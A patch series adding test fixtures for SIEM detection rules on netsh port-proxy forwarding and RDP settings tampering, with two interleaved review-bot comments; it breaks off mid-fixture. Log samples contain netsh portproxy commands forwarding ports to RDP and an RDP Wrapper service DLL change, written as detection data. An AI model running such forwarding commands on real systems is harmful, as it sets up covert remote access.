Subject: [PATCH 23/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Portprox?= =?UTF-8?q?y=5Fnetsh)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../Portproxy_netsh/tests/test_1.sc | 5 +++++
.../Portproxy_netsh/tests/test_2.sc | 4 ++++
.../Portproxy_netsh/tests/test_3.sc | 4 ++++
.../Portproxy_netsh/tests/test_4.sc | 4 ++++
4 files changed, 17 insertions(+)
create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Portproxy_netsh/tests/test_1.sc
create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Portproxy_netsh/tests/test_2.sc
create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Portproxy_netsh/tests/test_3.sc
create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Portproxy_netsh/tests/test_4.sc
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Portproxy_netsh/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Portproxy_netsh/tests/test_1.sc
new file mode 100644
index 00000000..e4b10e66
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Portproxy_netsh/tests/test_1.sc 
@@ -0,0 +1,5 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"13\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"13\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-05-23 17:46:05.022129\"},\"EventRecordID\":\"1027\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2032\",\"ThreadID\":\"2092\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"EventType\",\"text\":\"SetValue\"},{\"Name\":\"UtcTime\",\"text\":\"2019-05-23 17:46:05.022\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-dc5c-5ce6-0000-001066e27200}\"},{\"Name\":\"ProcessId\",\"text\":\"4088\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\system32\\\\netsh.exe\"},{\"Name\":\"TargetObject\",\"text\":\"HKLM\\\\System\\\\CurrentControlSet\\\\services\\\\PortProxy\\\\v4tov4\\\\tcp\\\\1.2.3.4/8001\"},{\"Name\":\"Details\",\"text\":\"1.2.3.5/3389\"}]}}}", "category.generic": "Registry Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_13_Registry_value_changed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "13", "normalized": true, "object": "reg_object", "object.fullpath": "\\registry\\machine\\system\\currentcontrolset\\services\\portproxy\\v4tov4\\tcp\\1.2.3.4/8001", "object.name": 
"1.2.3.4/8001", "object.new_value": "1.2.3.5/3389", "object.path": "\\registry\\machine\\system\\currentcontrolset\\services\\portproxy\\v4tov4\\tcp\\", "object.property": "value", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-03T06:34:35.025Z", "status": "success", "subject.process.fullpath": "c:\\windows\\system32\\netsh.exe", "subject.process.guid": "365abb72-dc5c-5ce6-0000-001066e27200", "subject.process.id": "4088", "subject.process.name": "netsh.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-05-23T17:46:05.022Z", "type": "raw", "uuid": "a3d8416f-817b-4b7c-b49c-e33add019e92"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "create", "alert.context": "c:\\windows\\system32\\netsh.exe 1.2.3.4/8001->1.2.3.5/3389", "alert.key": "1.2.3.4/8001->1.2.3.5/3389", "category.generic": "Attack", "category.high": "Command and Control", "category.low": "Proxy", "correlation_name": "Portproxy_netsh", "correlation_type": "incident", "event_src.category": "Other", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Portproxy_netsh|iewin7", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "reg_object", "object.fullpath": "\\registry\\machine\\system\\currentcontrolset\\services\\portproxy\\v4tov4\\tcp\\1.2.3.4/8001", "object.name": "1.2.3.4/8001", "object.new_value": "1.2.3.5/3389", "object.path": "\\registry\\machine\\system\\currentcontrolset\\services\\portproxy\\v4tov4\\tcp\\", "object.property": "value", "status": "success", "subject.process.fullpath": "c:\\windows\\system32\\netsh.exe", "subject.process.guid": 
"365abb72-dc5c-5ce6-0000-001066e27200", "subject.process.id": "4088", "subject.process.name": "netsh.exe", "subject.process.path": "c:\\windows\\system32\\"}
+
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Portproxy_netsh/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Portproxy_netsh/tests/test_2.sc
new file mode 100644
index 00000000..2437f1e3
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Portproxy_netsh/tests/test_2.sc 
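Review bot: The expected `incident.aggregation.key` on this expect line is `Portproxy_netsh|iewin7`, host only, so the fixture pins that every portproxy entry created on one host inside the 7200 s aggregation timeout folds into a single incident, with the listener/target pair (`1.2.3.4/8001->1.2.3.5/3389`) surviving only in `alert.key`. test_2, test_3 and test_4 assert the same host-only key. If that collapse is intended, a short comment above the expect line should say so; if not, these tests lock in behaviour the rule author may want to revisit, because several distinct forwarders set up on one host would surface as one incident and only the first alert's context would be visible at incident level.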
@@ -0,0 +1,4 @@ +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-05-23 17:46:04.671625\"},\"EventRecordID\":\"1026\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2032\",\"ThreadID\":\"2092\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-05-23 17:46:04.651\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-dc5c-5ce6-0000-001066e27200}\"},{\"Name\":\"ProcessId\",\"text\":\"4088\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\netsh.exe\"},{\"Name\":\"FileVersion\",\"text\":\"6.1.7600.16385 (win7_rtm.090713-1255)\"},{\"Name\":\"Description\",\"text\":\"Network Command Shell\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 
c=1.2.3.5\"},{\"Name\":\"CurrentDirectory\",\"text\":\"c:\\\\\"},{\"Name\":\"User\",\"text\":\"IEWIN7\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{365abb72-ce6c-5ce6-0000-002047f30000}\"},{\"Name\":\"LogonId\",\"text\":\"0x000000000000f347\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=7DA1852DF83C58841AD35248AD2A20D7FFBB7FA0,MD5=784A50A6A09C25F011C3143DDD68E729,SHA256=661F5D4CE4F0A6CB32669A43CE5DEEC6D5A9E19B2387F22C5012405E92169943,IMPHASH=33B8120C37D7861778989FBFD16214E1\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{365abb72-dc3e-5ce6-0000-00102bc97200}\"},{\"Name\":\"ParentProcessId\",\"text\":\"712\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "365abb72-ce6c-5ce6-0000-002047f30000", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "62279", "object.process.cmdline": "netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5", "object.process.cwd": "c:\\", "object.process.fullpath": "c:\\windows\\system32\\netsh.exe", "object.process.guid": 
"365abb72-dc5c-5ce6-0000-001066e27200", "object.process.hash.imphash": "33B8120C37D7861778989FBFD16214E1", "object.process.hash.md5": "784A50A6A09C25F011C3143DDD68E729", "object.process.hash.sha1": "7DA1852DF83C58841AD35248AD2A20D7FFBB7FA0", "object.process.hash.sha256": "661F5D4CE4F0A6CB32669A43CE5DEEC6D5A9E19B2387F22C5012405E92169943", "object.process.id": "4088", "object.process.meta": "Description:Network Command Shell | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "netsh.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.parent.guid": "365abb72-dc3e-5ce6-0000-00102bc97200", "object.process.parent.id": "712", "object.process.parent.name": "cmd.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.1.7600.16385 (win7_rtm.090713-1255)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-03T10:10:15.193Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "62279", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-05-23T17:46:04.651Z", "type": "raw", "uuid": "a74d0b25-16d5-4ed0-aea1-cfed8b6da080"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "create", "alert.context": "iewin7\\ieuser netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5", "alert.key": "netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5", "category.generic": "Attack", "category.high": "Command and Control", "category.low": "Proxy", "correlation_name": "Portproxy_netsh", "correlation_type": "incident", "datafield6": "365abb72-ce6c-5ce6-0000-002047f30000", "event_src.category": "Other", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Portproxy_netsh|iewin7", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "62279", "object.process.cmdline": "netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5", "object.process.cwd": "c:\\", "object.process.fullpath": "c:\\windows\\system32\\netsh.exe", "object.process.guid": "365abb72-dc5c-5ce6-0000-001066e27200", "object.process.hash.md5": "784A50A6A09C25F011C3143DDD68E729", "object.process.hash.sha1": "7DA1852DF83C58841AD35248AD2A20D7FFBB7FA0", "object.process.hash.sha256": "661F5D4CE4F0A6CB32669A43CE5DEEC6D5A9E19B2387F22C5012405E92169943", "object.process.id": "4088", "object.process.meta": "Description:Network Command Shell | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "netsh.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.parent.id": "712", "object.process.parent.name": 
"cmd.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.1.7600.16385 (win7_rtm.090713-1255)", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "62279"}
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Portproxy_netsh/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Portproxy_netsh/tests/test_3.sc
new file mode 100644
index 00000000..d6b1144c
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Portproxy_netsh/tests/test_3.sc 
@@ -0,0 +1,4 @@ +{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4657\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12801\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-03T09:35:26.2279148Z\"},\"EventRecordID\":\"97027\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"6900\"},\"Channel\":\"Security\",\"Computer\":\"pc1.lab.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-1840087645-2506612525-4240436938-1000\"},{\"Name\":\"SubjectUserName\",\"text\":\"admin\"},{\"Name\":\"SubjectDomainName\",\"text\":\"LAB\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x520de\"},{\"Name\":\"ObjectName\",\"text\":\"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Services\\\\PortProxy\\\\v4tov4\\\\tcp\"},{\"Name\":\"ObjectValueName\",\"text\":\"0.0.0.0/8882\"},{\"Name\":\"HandleId\",\"text\":\"0x4a0\"},{\"Name\":\"OperationType\",\"text\":\"%%1904\"},{\"Name\":\"OldValueType\",\"text\":\"-\"},{\"Name\":\"OldValue\",\"text\":\"-\"},{\"Name\":\"NewValueType\",\"text\":\"%%1873\"},{\"Name\":\"NewValue\",\"text\":\"0.0.0.0/3382\"},{\"Name\":\"ProcessId\",\"text\":\"0xd00\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\netsh.exe\"}]}}}", "category.generic": "Registry Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Operating system", "event_src.fqdn": "pc1.lab.local", "event_src.host": "pc1.lab.local", "event_src.hostname": "pc1", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4657_Registry_value_changed", "importance": "info", 
"input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4657", "normalized": true, "object": "reg_object", "object.fullpath": "\\registry\\machine\\system\\controlset001\\services\\portproxy\\v4tov4\\tcp\\0.0.0.0/8882", "object.name": "0.0.0.0/8882", "object.new_value": "0.0.0.0/3382", "object.path": "\\registry\\machine\\system\\controlset001\\services\\portproxy\\v4tov4\\tcp", "object.property": "value", "object.value": "-", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-03T09:36:06.739Z", "status": "success", "subject": "account", "subject.account.domain": "lab", "subject.account.id": "S-1-5-21-1840087645-2506612525-4240436938-1000", "subject.account.name": "admin", "subject.account.session_id": "336094", "subject.process.fullpath": "C:\\Windows\\System32\\netsh.exe", "subject.process.name": "netsh.exe", "subject.process.path": "C:\\Windows\\System32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-03T09:35:26.227Z", "type": "raw", "uuid": "246f60fe-90f0-472d-a419-9284174bdeb1"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "create", "alert.context": "C:\\Windows\\System32\\netsh.exe 0.0.0.0/8882->0.0.0.0/3382", "alert.key": "0.0.0.0/8882->0.0.0.0/3382", "category.generic": "Attack", "category.high": "Command and Control", "category.low": "Proxy", "correlation_name": "Portproxy_netsh", "correlation_type": "incident", "event_src.category": "Operating system", "event_src.host": "pc1.lab.local", "event_src.hostname": "pc1", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Portproxy_netsh|pc1.lab.local", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "reg_object", "object.fullpath": "\\registry\\machine\\system\\controlset001\\services\\portproxy\\v4tov4\\tcp\\0.0.0.0/8882", "object.name": "0.0.0.0/8882", "object.new_value": "0.0.0.0/3382", "object.path": "\\registry\\machine\\system\\controlset001\\services\\portproxy\\v4tov4\\tcp", "object.property": "value", "object.value": "-", "status": "success", "subject.account.domain": "lab", "subject.account.id": "S-1-5-21-1840087645-2506612525-4240436938-1000", "subject.account.name": "admin", "subject.account.session_id": "336094", "subject.process.fullpath": "C:\\Windows\\System32\\netsh.exe", "subject.process.name": "netsh.exe", "subject.process.path": "C:\\Windows\\System32\\"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Portproxy_netsh/tests/test_4.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Portproxy_netsh/tests/test_4.sc new file mode 100644 index 00000000..e7912d49 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Portproxy_netsh/tests/test_4.sc 
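Review bot: The expect line for this 4657 fixture carries no `subject` field although the normalized input above it has `"subject": "account"`, whereas the 4688 fixture in test_4 expects `"subject": "account"` to be carried through. That looks like the registry branch of the rule copying a fixed field list that omits `subject`; the Sysmon 13 input in test_1 has no `subject` at all, so the omission is invisible there and only this fixture can catch it. If dropping the field is deliberate, the test comment should say so; otherwise the expected event should include `"subject": "account"` so the test fails when the field is lost.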
@@ -0,0 +1,4 @@ +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4688\",\"Version\":\"2\",\"Level\":\"0\",\"Task\":\"13312\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-03T09:35:26.1698588Z\"},\"EventRecordID\":\"97025\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"6900\"},\"Channel\":\"Security\",\"Computer\":\"pc1.lab.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-1840087645-2506612525-4240436938-1000\"},{\"Name\":\"SubjectUserName\",\"text\":\"admin\"},{\"Name\":\"SubjectDomainName\",\"text\":\"LAB\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x520de\"},{\"Name\":\"NewProcessId\",\"text\":\"0xd00\"},{\"Name\":\"NewProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\netsh.exe\"},{\"Name\":\"TokenElevationType\",\"text\":\"%%1936\"},{\"Name\":\"ProcessId\",\"text\":\"0x8fc\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\netsh.exe\\\" interface port add v4 listenaddress=0.0.0.0 listenport=8882 connecta=0.0.0.0 connectp=3382\"},{\"Name\":\"TargetUserSid\",\"text\":\"S-1-0-0\"},{\"Name\":\"TargetUserName\",\"text\":\"-\"},{\"Name\":\"TargetDomainName\",\"text\":\"-\"},{\"Name\":\"TargetLogonId\",\"text\":\"0x0\"},{\"Name\":\"ParentProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"},{\"Name\":\"MandatoryLabel\",\"text\":\"S-1-16-12288\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "event_src.category": "Operating system", "event_src.fqdn": "pc1.lab.local", "event_src.host": "pc1.lab.local", "event_src.hostname": "pc1", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": 
"microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4688_A_new_process_has_been_created", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4688", "normalized": true, "object": "process", "object.account.domain": "lab", "object.account.id": "S-1-5-21-1840087645-2506612525-4240436938-1000", "object.account.name": "admin", "object.account.session_id": "336094", "object.process.cmdline": "\"C:\\Windows\\system32\\netsh.exe\" interface port add v4 listenaddress=0.0.0.0 listenport=8882 connecta=0.0.0.0 connectp=3382", "object.process.fullpath": "c:\\windows\\system32\\netsh.exe", "object.process.id": "3328", "object.process.name": "netsh.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "object.process.parent.id": "2300", "object.process.parent.name": "powershell.exe", "object.process.parent.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "object.process.path": "c:\\windows\\system32\\", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-03T09:38:00.838Z", "status": "success", "subject": "account", "subject.account.domain": "lab", "subject.account.id": "S-1-5-21-1840087645-2506612525-4240436938-1000", "subject.account.name": "admin", "subject.account.privileges": "TokenElevationTypeDefault", "subject.account.session_id": "336094", "subject.state": "on behalf of oneself", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-03T09:35:26.169Z", "type": "raw", "uuid": "abdf4340-6eeb-450b-a57e-2851c16dc7fd"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "create", "alert.context": "lab\\admin \"C:\\Windows\\system32\\netsh.exe\" interface port add v4 listenaddress=0.0.0.0 listenport=8882 connecta=0.0.0.0 connectp=3382", "alert.key": "\"C:\\Windows\\system32\\netsh.exe\" interface port add v4 listenaddress=0.0.0.0 listenport=8882 connecta=0.0.0.0 connectp=3382", "category.generic": "Attack", "category.high": "Command and Control", "category.low": "Proxy", "correlation_name": "Portproxy_netsh", "correlation_type": "incident", "event_src.category": "Operating system", "event_src.host": "pc1.lab.local", "event_src.hostname": "pc1", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Portproxy_netsh|pc1.lab.local", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "process", "object.account.domain": "lab", "object.account.id": "S-1-5-21-1840087645-2506612525-4240436938-1000", "object.account.name": "admin", "object.account.session_id": "336094", "object.process.cmdline": "\"C:\\Windows\\system32\\netsh.exe\" interface port add v4 listenaddress=0.0.0.0 listenport=8882 connecta=0.0.0.0 connectp=3382", "object.process.fullpath": "c:\\windows\\system32\\netsh.exe", "object.process.id": "3328", "object.process.name": "netsh.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "object.process.parent.id": "2300", "object.process.parent.name": "powershell.exe", "object.process.parent.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "object.process.path": "c:\\windows\\system32\\", "status": "success", "subject": "account", "subject.account.domain": "lab", "subject.account.id": "S-1-5-21-1840087645-2506612525-4240436938-1000", "subject.account.name": "admin", "subject.account.privileges": "TokenElevationTypeDefault", 
"subject.account.session_id": "336094"}
From 2544e5f5edfd077489376dc2bd66b94c82620a82 Mon Sep 17 00:00:00 2001
From: shadow2033 <135636880+shadow2033@users.noreply.github.com>
Date: Mon, 31 Jul 2023 12:06:59 +0300
Subject: [PATCH 24/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(RDP=5Fse?= =?UTF-8?q?ttings=5Ftampering)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../RDP_settings_tampering/tests/test_1.sc | 4 ++++
.../RDP_settings_tampering/tests/test_2.sc | 4 ++++
.../RDP_settings_tampering/tests/test_3.sc | 4 ++++
.../RDP_settings_tampering/tests/test_4.sc | 4 ++++
4 files changed, 16 insertions(+)
create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/RDP_settings_tampering/tests/test_1.sc
create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/RDP_settings_tampering/tests/test_2.sc
create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/RDP_settings_tampering/tests/test_3.sc
create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/RDP_settings_tampering/tests/test_4.sc
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/RDP_settings_tampering/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/RDP_settings_tampering/tests/test_1.sc
new file mode 100644
index 00000000..f274b0e8
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/RDP_settings_tampering/tests/test_1.sc 
@@ -0,0 +1,4 @@
+{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"13\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"13\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-03-17T20:18:05.0865600Z\"},\"EventRecordID\":\"5265\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1852\",\"ThreadID\":\"464\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"PC04.example.corp\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"EventType\",\"text\":\"SetValue\"},{\"Name\":\"UtcTime\",\"text\":\"2019-03-17 20:18:05.086\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-ab70-5c8e-0000-0010df1f0a00}\"},{\"Name\":\"ProcessId\",\"text\":\"3700\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\RDPWrap-v1.6.2\\\\RDPWInst.exe\"},{\"Name\":\"TargetObject\",\"text\":\"HKLM\\\\System\\\\CurrentControlSet\\\\services\\\\TermService\\\\Parameters\\\\ServiceDll\"},{\"Name\":\"Details\",\"text\":\"%%ProgramFiles%%\\\\RDP Wrapper\\\\rdpwrap.dll\"}]}}}", "category.generic": "Registry Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "pc04.example.corp", "event_src.host": "pc04.example.corp", "event_src.hostname": "pc04", 